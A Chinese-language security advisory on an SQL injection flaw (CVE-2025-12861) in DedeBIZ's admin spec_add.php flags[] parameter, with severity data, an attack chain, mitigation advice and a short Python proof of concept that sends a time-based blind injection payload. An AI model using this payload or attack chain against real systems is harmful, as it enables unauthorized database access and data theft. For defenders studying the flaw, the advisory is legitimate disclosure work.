DedeBIZ 6.3.2及之前版本 /admin/spec_add.php flags[]参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12861

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

DedeBIZ

漏洞概述

DedeBIZ是一款开源的PHP内容管理系统，广泛应用于企业网站建设和内容管理场景。该系统存在一个严重的安全漏洞，编号为CVE-2025-12861，攻击者可利用/admin/spec_add.php文件中的flags[]参数进行SQL注入攻击。漏洞影响DedeBIZ 6.3.2及之前的所有版本。由于该漏洞的利用代码已公开披露，攻击者可以轻易获取漏洞详情并实施攻击。成功利用此漏洞后，攻击者可以获取数据库中的敏感信息，包括用户凭证、业务数据等，甚至可能在特定条件下实现远程代码执行。鉴于该漏洞已被公开披露且利用难度较低，建议受影响的用户立即采取修复措施。

技术细节

该漏洞位于DedeBIZ管理后台的/spec_add.php文件中的flags[]参数处理逻辑。攻击者通过构造恶意的SQL语句片段作为flags[]参数的值，在后台执行数据库查询时注入额外的SQL代码。由于该参数在数据库查询前未经过充分的输入验证和过滤，攻击者可以利用UNION SELECT、盲注等技术从数据库中提取敏感信息。漏洞的CVSS评分为4.7（中等严重性），攻击向量为网络形式，攻击复杂度低，但需要管理员权限。由于flags[]参数直接参与SQL查询构造，攻击者可以通过精心设计的payload实现数据提取、数据库枚举甚至在某些配置下执行系统命令。建议开发者使用参数化查询或预编译语句来修复此漏洞，并对所有用户输入进行严格的输入验证。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的DedeBIZ版本，确认版本号 <= 6.3.2

STEP 2

步骤2

攻击者获取DedeBIZ管理后台的访问权限（通过默认凭证、暴力破解或其他方式）

STEP 3

步骤3

访问/admin/spec_add.php页面，找到flags[]参数

STEP 4

步骤4

构造恶意SQL注入payload，如使用UNION SELECT或时间盲注技术

STEP 5

步骤5

发送恶意请求，触发SQL注入漏洞执行注入的SQL代码

STEP 6

步骤6

从数据库响应中提取敏感信息，如用户表数据、配置信息等

STEP 7

步骤7

利用获取的敏感信息进行进一步攻击，如横向移动或权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12861 PoC - DedeBIZ SQL Injection in /admin/spec_add.php
# Target: DedeBIZ <= 6.3.2
# Parameter: flags[]
# Note: Requires admin privileges

TARGET_URL = "http://target.com/admin/spec_add.php"
ADMIN_COOKIE = "admin_session_cookie_here"

def exploit_sql_injection():
    """Extract database version using SQL injection in flags[] parameter"""
    headers = {
        "Cookie": ADMIN_COOKIE,
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    # SQL injection payload to extract database version
    # Using time-based blind injection technique
    payload = {
        "flags[]": "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- -",
        "action": "submit"
    }
    
    try:
        print(f"[*] Sending SQL injection payload to {TARGET_URL}")
        response = requests.post(TARGET_URL, data=payload, headers=headers, timeout=30)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Payload sent successfully")
        print("[*] Check for time delay to confirm vulnerability")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    exploit_sql_injection()

影响范围

DedeBIZ <= 6.3.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制/admin/spec_add.php的访问权限，仅允许受信任的管理员IP访问；2) 暂时禁用spec_add.php功能；3) 部署ModSecurity等WAF规则拦截包含SQL注入特征的请求；4) 加强对管理后台登录的监控和告警；5) 定期备份数据库以便在发生安全事件时快速恢复。建议尽快升级到官方发布的安全版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12861
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12861
3 Details https://www.cvedetails.com/cve/CVE-2025-12861/
4 VulDB https://vuldb.com/cve/CVE-2025-12861
5 Link https://github.com/ZZCTD/zz_test/issues/3
6 Link https://vuldb.com/?ctiid.331508
7 Link https://vuldb.com/?id.331508
8 Link https://vuldb.com/?submit.679692
9 Link https://github.com/ZZCTD/zz_test/issues/3